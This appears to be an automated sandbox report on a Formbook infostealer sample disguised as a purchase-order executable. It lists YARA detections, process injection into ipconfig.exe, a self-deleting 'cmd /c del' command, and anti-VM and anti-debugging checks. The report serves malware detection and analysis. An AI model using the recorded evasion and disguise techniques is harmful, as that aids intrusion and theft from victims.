          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010528EC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8F900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01052B28
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0104DBD2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010403DA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0103FA2B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FBEBB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010522AE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAAB40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01052D07
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01051D55
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010525DD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9841F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9D5E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0104D466
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F80D20
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FA6E30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0105DFCE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01051FF1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0104D616
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01052EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F422AE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F2FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F3DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F303DA
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EAEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E9AB40
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F42B28
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F428EC
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F420A8
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E8B090
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F4E824
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F31002
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E7F900
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F42EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E96E30
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F3D616
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F41FF1
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F4DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F3D466
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E8841F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E8D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F425DD
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EA2581
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F41D55
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E70D20
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F42D07
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B08A3B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B08A40
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1C16E
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B02FB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1BF03
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B02D90
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B02D8A
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013E0550 appears 47 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013EDBFD appears 32 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013DB9F5 appears 624 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 00F8B150 appears 54 times
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02E7B150 appears 48 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/0@17/13
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: Purchase Order 40,7045$.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Purchase Order 40,7045$.exe | Virustotal: Detection: 43%
          Source: Purchase Order 40,7045$.exe | ReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | File read: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: Purchase Order 40,7045$.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E0595 push ecx; ret 0_2_013E05A8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013DD44F push ecx; ret 0_2_013DD462
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00415913 push edx; retf 1_2_00415915
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AC62 push D8D19732h; iretd 1_2_0041AC69
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414D57 push esi; retf 1_2_00414D58
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AD65 push eax; ret 1_2_0041ADB8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414DEA push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041ADB2 push eax; ret 1_2_0041ADB8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041ADBB push eax; ret 1_2_0041AE22
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414E7E push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AE1C push eax; ret 1_2_0041AE22
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414E24 push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0040FF92 push 00000033h; iretd 1_2_0040FF98
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FDD0D1 push ecx; ret 1_2_00FDD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02ECD0D1 push ecx; ret 5_2_02ECD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B15913 push edx; retf 5_2_02B15915
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14E24 push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AE1C push eax; ret 5_2_02B1AE22
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14E7E push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B0FF92 push 00000033h; iretd 5_2_02B0FF98
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AC62 push D8D19732h; iretd 5_2_02B1AC69
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1ADB2 push eax; ret 5_2_02B1ADB8
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1ADBB push eax; ret 5_2_02B1AE22
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14DEA push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AD65 push eax; ret 5_2_02B1ADB8
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14D57 push esi; retf 5_2_02B14D58

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_004086A0 rdtsc 1_2_004086A0
          Source: C:\Windows\explorer.exe TID: 5636 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_004086A0 rdtsc 1_2_004086A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00409900 LdrLoadDll,1_2_00409900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013E032D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,0_2_013D7FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]0_2_013FD014
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]0_2_013FD051
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]0_2_013FD0B4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]0_2_013FC520
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]1_2_00F858EC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]1_2_00FC90AF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
